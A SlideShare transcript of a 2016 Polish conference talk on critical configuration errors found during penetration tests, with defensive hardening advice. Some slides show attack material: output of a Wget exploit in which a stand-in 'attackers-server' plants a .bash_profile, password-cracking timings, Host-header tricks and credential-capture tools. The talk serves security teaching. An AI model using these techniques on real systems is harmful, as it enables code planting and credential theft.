SlideShare a Scribd company logo

Krytyczne błędy konfiguracji

Logicaltrust pl
Logicaltrust pl

Security PWNing Conference 2016 (08.11.2016) Borys Łącki

Technology
1 of 65
Download to read offline
Security PWNing Conference 2016 Krytyczne błędy konfiguracji Borys Łącki 08.11.2016
Od ponad 10 lat wykonując testy penetracyjne, testujemy bezpieczeństwo i zabezpieczamy zasoby Klientów. Borys Łącki - Logicaltrust
Edukacja http://sprawdzpesel.pl > 100 wykładów
Nasza perspektywa ● Test penetracyjny – „proces polegający na przeprowadzeniu kontrolowanego ataku na system teleinformatyczny, mający na celu praktyczną ocenę bieżącego stanu bezpieczeństwa (...)” Wikipedia
Budowanie bezpieczeństwa
Konfiguracja ● Oddzielaj ● Aktualizuj ● Weryfikuj ● Ograniczaj ● Porządkuj ● Monitoruj ● Dokumentuj ● Automatyzuj
Konfiguracja - cel Ograniczanie udanych ataków Spowalnianie atakujących
Konfiguracja
BugBounty – wyciek informacji
BugBounty – konfiguracja OAuth
BugBounty – brak separacji + hasła username: admin and password: ???????
BugBounty – konfiguracja DNS
BugBounty – brak separacji
BugBounty – ujawnienie informacji
BugBounty – ujawnienie informacji
Security Appliance ● Brak aktualizacji ● Błędna konfiguracja ● Proste i stałe hasła ● Stałe klucze/certyfikaty SSL (SelfSigned cert) – podsłuchiwanie Palo Alto - Attacking Next - Generation Firewalls
Aktualizacje – stacje robocze
Aktualizacje – stacje robocze
Aktualizacje – serwery
Aktualizacje – serwery GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution victim@trusty:~$ wget http://attackers-server/safe-file.txt Resolving attackers-server... 192.168.57.1 Connecting to attackers-server|192.168.57.1|:80... connected. HTTP request sent, awaiting response... 302 Found Location: ftp://192.168.57.1/.bash_profile [following] => .bash_profile Connecting to 192.168.57.1:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD not needed. ==> SIZE .bash_profile ... 55 ==> PASV ... done. ==> RETR .bash_profile ... done. Length: 55 (unauthoritative) .bash_profile 100% [===============================================================>] 2016-02-19 04:50:37 (1.27 MB/s) - .bash_profile saved [55]
Aktualizacje - kernel
Firewall iptables -n -L INPUT Chain INPUT (policy DROP) ip6tables -n -L INPUT Chain INPUT (policy ACCEPT)
Firewall - VLANs Dostęp działu HR do repozytorium kodu źródłowego
VMware vSwitch – ARP spoofing
Firewall – ICMP redirect - off Type=5, Code=1 (or Lady In The Middle) Dorota Kulas
Firewall – ACL https://www.youtube.com/watch?v=fRinW7SJC6Q APT x 3 - wybrane studium przypadków
Konfiguracja - Debug
Apache mod_negotiate GET /index HTTP/1.1 Accept: xxxx/xxxx < HTTP/1.1 406 Not Acceptable < Alternates: {"index.html.ca" 1 {type text/html} {language ca} {length 1884}}, {"index.html.cz" 1 {type text/html} {language cs} {length 1583}}, {"index.html.de" 1 {type text/html} {language de} {length 2274}}, {"index.html.dk" 1 {type text/html} {language da} {length 1557}}, {"index.html.ee" 1 {type text/html} {language et} {length 1877}}, {"index.html.el" 1 {type text/html} {language el} {length 1677}}, {"index.html.en" 1 {type text/html} {language en} {length 2673}}, {"index.html.es" 1 {type text/html} {language es} {length 1799}}, {"index.html.fr" 1 {type text/html} {language fr} {length 1525}}, {"index.html.he.iso8859-8" 1 {type text/html} {charset iso-8859-8} {language he} {length 3706}}, {"index.html.it" 1 {type text/html} {language it} {length 1847}}, {"index.html.ja.jis" 1 {type text/html} {charset iso-2022-jp} {language ja} {length 1799}}, {"index.html.kr.iso-kr" 1 {type text/html} {charset iso-2022-kr} {language kr} {length 1333}}, {"index.html.nl" 1 {type text/html} {language nl} {length 2007}}, {"index.html.nn" 1 {type text/html} {language nn} {length 1534}}, {"index.html.no" 1 {type text/html} {language no} {length 1526}}, {"index.html.po.iso-pl" 1 {type text/html} {charset iso-8859-2} {language pl} {length 1497}}, {"index.html.pt" 1 {type text/html} {language pt} {length 1842}}, {"index.html.pt-br" 1 {type text/html} {language pt-br} {length 2035}}, {"index.html.ru.cp-1251" 1 {type text/html} {charset windows-1251} {language ru} {length 1591}}, {"index.html.ru.cp866" 1 {type text/html} {charset cp866} {language ru} {length 1585}}, {"index.html.ru.iso-ru" 1 {type text/html} {charset iso-8859-5} {language ru} {length 1589}}, {"index.html.ru.koi8-r" 1 {type text/html} {charset koi8-r} {language ru} {length 1585}}, {"index.html.ru.ucs2" 1 {type text/html} {charset ucs-2} {language ru} {length 3134}}, {"index.html.ru.ucs4" 1 {type text/html} {charset ucs-4} {language ru} {length 6268}}, {"index.html.ru.utf8" 1 {type text/html} {charset utf-8} {language ru} {length 2318}}, {"index.html.zh-tw.big5" 1 {type text/html} {charset big5} {language zh-tw} {length 1062}} < Vary: negotiate,accept-language,accept-charset
IIS Deploy IIS with 8.3 names disabled https://github.com/irsdl/IIS-ShortName-Scanner
SSL / TLS
Web Application Firewall
Zbędne zasoby
Zbędne zasoby
Zbędne zasoby ls -ltr /tmp/ -rw-r--r-- 1 root root 7077888 mar 15 2016 sqldump.tar.bz2 drwx------ 2 root root 4096 kwi 3 2016 gpg-oqFS5S -rw-r--r-- 1 root root 12189696 maj 29 00:00 database.pgsql.gz drwx------ 2 root root 4096 wrz 12 00:00 lu9eqlt2.tmp -rw------- 1 root root 0 paź 14 08:41 config-err-97zpmD
Zbędne zasoby
Proxy, Vhost, Load Balancer ● Host: 127.0.0.1 ● Host: test ● GET@inna.domena.com/ HTTP/1.1 http://pliki.domena.com@inna.domena.com/
Algorytmy haseł ./john .htaccess-bcrypt Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) c/s: 1412 > 4 lata ./john .htaccess-crypt Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16]) c/s: 2907K 19 godzin
USB – Rubber Ducky http://usbrubberducky.com
USB Ethernet + Responder == Creds https://room362.com/post/2016/snagging-creds-from-locked-machines/
Logowanie
Active Directory ● LAN Manager authentication level: Send NTLMv2 response only. Refuse LM & NTLM ● Microsoft network server: Digitally sign communication (always): Enabled ● Network access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled Securing Domain Controllers to Improve Active Directory Security https://adsecurity.org/?p=3377
Windows Workstation
Windows Workstation
Windows Workstation
Windows Workstation - EMET
Windows Workstation ● Disable WPAD ● Disable LLMNR ● Disable Microsoft Office Macros ● Disable Microsoft Office OLE Securing Windows Workstations: Developing a Secure Baseline https://adsecurity.org/?p=3299
Zarządzanie danymi
Zbędne zasoby i informacje
Zbędne usługi
GIT repository
Hasło „na moment” SECURE 2016 – Łukasz Siewierski – Mój serwer jest chory!
Błędne uprawnienia ls -ltr /etc/cron.daily/ -rwxr-xr-x 1 root root 15481 paź 28 2014 apt -rwxr-xr-x 1 root root 625 lip 22 2014 apache2 -rwxr-xr-x 1 root root 123 sty 29 2014 tripwire -rwxrwxrwx 1 root root 173 kwi 9 2016 database_update.sh
Błędne uprawnienia -rw-r--r-- 1 root mlocate 20635027 lis 4 12:26 /var/lib/mlocate/mlocate.db
Opowieści z krypty – hosting w PL Na tym serwerze byl calkowity brak miejsca na partycjach i system krytycznych analiz musial usunac kilka kopii zapasowych userow aby serwer dzialal bedziemy zmieniac macierz dyskowa na tym serwerze na wieksza aby nikomu nie brakowalo miejsca na ta chwile przepraszamy za sytuacje i dodamy 1 miesiac gratis hostingu za to
Opowieści z krypty - porządek <xxx> kurwa prawie zawału dostałem <xxx> wpadam sprawdzić, czy się dobrze backup zrobił <xxx> patrzę, jest <xxx> ale daty się nie zgadzają <xxx> ostatni backup 04.2015 <xxx> ciśnienie mi się podniosło <xxx> szukam patrzę <xxx> a to stary serwer backupu <xxx> nie zgasiliśmy go <xxx> i sobie stoi <xxx> ja pierdolę :)
Opowieści z krypty - sieć <xxx> a to ja kiedys dawno temu przeczytalem gdzies <xxx> ze hackerzy beda robic konkurs w internecie kto wiecej stron zdefacuje <xxx> wiec chcialem zabezpieczyc swoj serwer <xxx> zalogowalem sie zdalnie <xxx> dalem iptables -P INPUT DROP <xxx> ... i byl bezpiecznie :)
Opowieści z krypty - procesy <yyy> uy mnie w robocie gosc puscil TRUNCATE bazy na produkcji wklejajac sql z neta bez sprawdzenia <xxx> u mnie puscil update tylko zapomnial dac where :D
● Polityka haseł (2FA) ● Aktualizacje systemów i aplikacji ● Segmentacja sieci (IPv4+IPv6) ● Szyfrowanie danych i transmisji ● Testy bezpieczeństwa ● Porządek – OS, Sieć, Urządzenia ● Ograniczenia kont (Administratorów) ● CIS Benchmark, NIST Security Checklist ● Zautomatyzowane testy bezpieczeństwa Obrona
● Oddzielaj - sieci ● Aktualizuj - oprogramowanie ● Weryfikuj - ustawienia ● Ograniczaj - uprawnienia ● Porządkuj - systemy ● Monitoruj - zasoby ● Dokumentuj - procesy ● Automatyzuj
Narzędzia - Lynis
Narzędzia
Materiały dodatkowe ● Narzędzia do zautomatyzowanego testowania bezpieczeństwa https://www.youtube.com/watch?v=9zgH7wHv_V0 ● OWASP Top10 Najpopularniejsze błędy bezpieczeństwa aplikacji WWW https://www.youtube.com/watch?v=hOAc5vUKrqA ● Podstawowy arsenał testera bezpieczeństwa aplikacji WWW https://www.youtube.com/watch?v=F1COxOJyM7o ● APT x 3 - wybrane studium przypadków https://www.youtube.com/watch?v=fRinW7SJC6Q ● The Security Checklist https://github.com/FallibleInc/security-guide-for-developers/blob/master/security-checklist.md
https://zaufanatrzeciastrona.pl http://sekurak.pl/ http://niebezpiecznik.pl http://bothunters.pl https://benchmarks.cisecurity.org/downloads/form/index.cfm?download=docker16.100 https://github.com/docker/docker-bench-security https://hackerone.com/reports/143482 https://hackerone.com/reports/116504 https://hackerone.com/reports/128114 https://hackerone.com/reports/136891 https://hackerone.com/reports/143438 https://hackerone.com/reports/126099 https://hackerone.com/reports/149679 https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/ https://zaufanatrzeciastrona.pl/post/jak-w-latwy-sposob-zainfekowac-17-000-komputerow-programistow/ https://github.com/irsdl/iis-shortname-scanner/ https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/ http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/ http://sprawdzpesel.pl https://quiz.securityinside.pl/quiz/start?id=1 https://quiz.securityinside.pl/quiz/start?id=2 http://www.slideshare.net/logicaltrust Ikony: https://www.iconfinder.com/Vecteezy Materiały dodatkowe
https://z3s.pl/szkolenia/ Atak i obrona: ● Bezpieczeństwo aplikacji WWW ● Bezpieczeństwo aplikacji mobilnych -20% Obowiązuje 31.337 dni Hasło: ITPWN16 Szkolenia – rabat
Dziękuję za uwagę Borys Łącki b.lacki@logicaltrust.net Pytania

Recommended

Devops/Sysops security
Devops/Sysops securityDevops/Sysops security
Devops/Sysops security
Logicaltrust pl
 
Devops security
Devops securityDevops security
Devops security
Logicaltrust pl
 
Testy bezpieczeństwa - niesztampowe przypadki
Testy bezpieczeństwa - niesztampowe przypadkiTesty bezpieczeństwa - niesztampowe przypadki
Testy bezpieczeństwa - niesztampowe przypadki
Logicaltrust pl
 
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Logicaltrust pl
 
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Logicaltrust pl
 
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Logicaltrust pl
 
Wyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Wyciek danych w aplikacjach - Artur Kalinowski, 4DevelopersWyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Wyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Logicaltrust pl
 
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
Logicaltrust pl
 

Recommended

Devops/Sysops security
Devops/Sysops securityDevops/Sysops security
Devops/Sysops security
Logicaltrust pl
 
Devops security
Devops securityDevops security
Devops security
Logicaltrust pl
 
Testy bezpieczeństwa - niesztampowe przypadki
Testy bezpieczeństwa - niesztampowe przypadkiTesty bezpieczeństwa - niesztampowe przypadki
Testy bezpieczeństwa - niesztampowe przypadki
Logicaltrust pl
 
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Urządzenia i usługi bezpieczeństwa IT - pełna ochrona czy... zaproszenie dla ...
Logicaltrust pl
 
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...
Logicaltrust pl
 
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Czy systematyczne podejście do testów bezpieczeństwa się opłaca?
Logicaltrust pl
 
Wyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Wyciek danych w aplikacjach - Artur Kalinowski, 4DevelopersWyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Wyciek danych w aplikacjach - Artur Kalinowski, 4Developers
Logicaltrust pl
 
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
OWASP Mobile TOP 10 na przykładzie aplikacji bankowych - Semafor 2016 - Mateu...
Logicaltrust pl
 
Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWWNarzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
Logicaltrust pl
 
Pentester - fakty i mity
Pentester - fakty i mityPentester - fakty i mity
Pentester - fakty i mity
Logicaltrust pl
 
10 przykazań bezpiecznego programowania
10 przykazań bezpiecznego programowania10 przykazań bezpiecznego programowania
10 przykazań bezpiecznego programowania
SecuRing
 
Linux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. RecepturyLinux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. Receptury
Wydawnictwo Helion
 
C i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. RecepturyC i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. Receptury
Wydawnictwo Helion
 
Zhakuj swojego Wordpressa, WordUP Trojmiasto
Zhakuj swojego Wordpressa, WordUP TrojmiastoZhakuj swojego Wordpressa, WordUP Trojmiasto
Zhakuj swojego Wordpressa, WordUP Trojmiasto
secman_pl
 
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowyPHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
Wydawnictwo Helion
 
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetuTestowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
SecuRing
 
Testowanie bezpieczenstwa aplikacji mobilnych
Testowanie bezpieczenstwa aplikacji mobilnychTestowanie bezpieczenstwa aplikacji mobilnych
Testowanie bezpieczenstwa aplikacji mobilnych
SecuRing
 
Czy naprawdę wiesz co robi twoja przeglądarka?
Czy naprawdę wiesz co robi twoja przeglądarka?Czy naprawdę wiesz co robi twoja przeglądarka?
Czy naprawdę wiesz co robi twoja przeglądarka?
OWASP
 
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę AndroidTestowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
SecuRing
 
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
PROIDEA
 
Malware vs autoryzacja transakcji
Malware vs autoryzacja transakcjiMalware vs autoryzacja transakcji
Malware vs autoryzacja transakcji
SecuRing
 
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.comNGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
Leszek Mi?
 
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
Leszek Mi?
 
Hijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymiHijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymi
Dorota Ręba
 
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
PROIDEA
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responce
msobiegraj
 
Szpiegowanie w internecie
Szpiegowanie w internecieSzpiegowanie w internecie
Szpiegowanie w internecie
Dorota Ręba
 
Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?
SecuRing
 
Torturing the PHP interpreter
Torturing the PHP interpreterTorturing the PHP interpreter
Torturing the PHP interpreter
Logicaltrust pl
 
Security news 20160128
Security news 20160128Security news 20160128
Security news 20160128
Logicaltrust pl
 

More Related Content

What's hot

Linux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. RecepturyLinux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. Receptury
Wydawnictwo Helion
 
C i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. RecepturyC i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. Receptury
Wydawnictwo Helion
 
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowyPHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
Wydawnictwo Helion
 
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetuTestowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
SecuRing
 
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
PROIDEA
 
Malware vs autoryzacja transakcji
Malware vs autoryzacja transakcjiMalware vs autoryzacja transakcji
Malware vs autoryzacja transakcji
SecuRing
 
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.comNGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
Leszek Mi?
 
Hijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymiHijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymi
Dorota Ręba
 
Szpiegowanie w internecie
Szpiegowanie w internecieSzpiegowanie w internecie
Szpiegowanie w internecie
Dorota Ręba
 
Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?
SecuRing
 

What's hot (20)

Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWWNarzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
Narzędzia do zautomatyzowanego testowania bezpieczeństwa aplikacji WWW
 
Pentester - fakty i mity
Pentester - fakty i mityPentester - fakty i mity
Pentester - fakty i mity
 
10 przykazań bezpiecznego programowania
10 przykazań bezpiecznego programowania10 przykazań bezpiecznego programowania
10 przykazań bezpiecznego programowania
 
Linux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. RecepturyLinux. Bezpieczeństwo. Receptury
Linux. Bezpieczeństwo. Receptury
 
C i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. RecepturyC i C++. Bezpieczne programowanie. Receptury
C i C++. Bezpieczne programowanie. Receptury
 
Zhakuj swojego Wordpressa, WordUP Trojmiasto
Zhakuj swojego Wordpressa, WordUP TrojmiastoZhakuj swojego Wordpressa, WordUP Trojmiasto
Zhakuj swojego Wordpressa, WordUP Trojmiasto
 
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowyPHP5. Bezpieczne programowanie. Leksykon kieszonkowy
PHP5. Bezpieczne programowanie. Leksykon kieszonkowy
 
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetuTestowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
 
Testowanie bezpieczenstwa aplikacji mobilnych
Testowanie bezpieczenstwa aplikacji mobilnychTestowanie bezpieczenstwa aplikacji mobilnych
Testowanie bezpieczenstwa aplikacji mobilnych
 
Czy naprawdę wiesz co robi twoja przeglądarka?
Czy naprawdę wiesz co robi twoja przeglądarka?Czy naprawdę wiesz co robi twoja przeglądarka?
Czy naprawdę wiesz co robi twoja przeglądarka?
 
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę AndroidTestowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
Testowanie bezpieczeństwa aplikacji dedykowanych na platformę Android
 
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
JDD 2017: Bezpieczny wypoczynek - czyli uwierzytelnianie RESTa (Krzysztof Be...
 
Malware vs autoryzacja transakcji
Malware vs autoryzacja transakcjiMalware vs autoryzacja transakcji
Malware vs autoryzacja transakcji
 
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.comNGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.com
 
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
Mapowanie wiedzy pentestera na potrzeby ochrony krytycznej infrastruktury IT ...
 
Hijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymiHijackthis – ochrona przed błędami komputerowymi
Hijackthis – ochrona przed błędami komputerowymi
 
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
"Sandbox dla PowerShell'a - zrób to sam!" - Dawid Pachowski
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responce
 
Szpiegowanie w internecie
Szpiegowanie w internecieSzpiegowanie w internecie
Szpiegowanie w internecie
 
Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?Jak tworzyć bezpieczne aplikacje?
Jak tworzyć bezpieczne aplikacje?
 

Viewers also liked

Viewers also liked (11)

Torturing the PHP interpreter
Torturing the PHP interpreterTorturing the PHP interpreter
Torturing the PHP interpreter
 
Security news 20160128
Security news 20160128Security news 20160128
Security news 20160128
 
Security news 20151119
Security news 20151119Security news 20151119
Security news 20151119
 
Bezpieczeństwo informacji - edukacja pracowników - dlaczego robimy to źle? Se...
Bezpieczeństwo informacji - edukacja pracowników - dlaczego robimy to źle? Se...Bezpieczeństwo informacji - edukacja pracowników - dlaczego robimy to źle? Se...
Bezpieczeństwo informacji - edukacja pracowników - dlaczego robimy to źle? Se...
 
Security news 20160225
Security news 20160225Security news 20160225
Security news 20160225
 
Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015
 
Praktyczne ataki na aplikacje webowe (TAPT 2015)
Praktyczne ataki na aplikacje webowe (TAPT 2015)Praktyczne ataki na aplikacje webowe (TAPT 2015)
Praktyczne ataki na aplikacje webowe (TAPT 2015)
 
Socjotechnika w Internecie - metody ataku i obrony
Socjotechnika w Internecie - metody ataku i obronySocjotechnika w Internecie - metody ataku i obrony
Socjotechnika w Internecie - metody ataku i obrony
 
Testy bezpieczeństwa aplikacji WWW – dobre praktyki
Testy bezpieczeństwa aplikacji WWW – dobre praktykiTesty bezpieczeństwa aplikacji WWW – dobre praktyki
Testy bezpieczeństwa aplikacji WWW – dobre praktyki
 
Cyberprzestepcy - Jak się bronić?
Cyberprzestepcy - Jak się bronić?Cyberprzestepcy - Jak się bronić?
Cyberprzestepcy - Jak się bronić?
 
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
 

Similar to Krytyczne błędy konfiguracji

Apache http server - proste i zaawansowane przypadki użycia
Apache http server - proste i zaawansowane przypadki użyciaApache http server - proste i zaawansowane przypadki użycia
Apache http server - proste i zaawansowane przypadki użycia
Wojciech Lichota
 
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
PROIDEA
 
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
The Software House
 
HTTP od zera do bohatera
HTTP od zera do bohateraHTTP od zera do bohatera
HTTP od zera do bohatera
HordeTechnology
 
tRPC - czy to koniec GraphQL?
tRPC - czy to koniec GraphQL?tRPC - czy to koniec GraphQL?
tRPC - czy to koniec GraphQL?
Brainhub
 

Similar to Krytyczne błędy konfiguracji (20)

Apache http server - proste i zaawansowane przypadki użycia
Apache http server - proste i zaawansowane przypadki użyciaApache http server - proste i zaawansowane przypadki użycia
Apache http server - proste i zaawansowane przypadki użycia
 
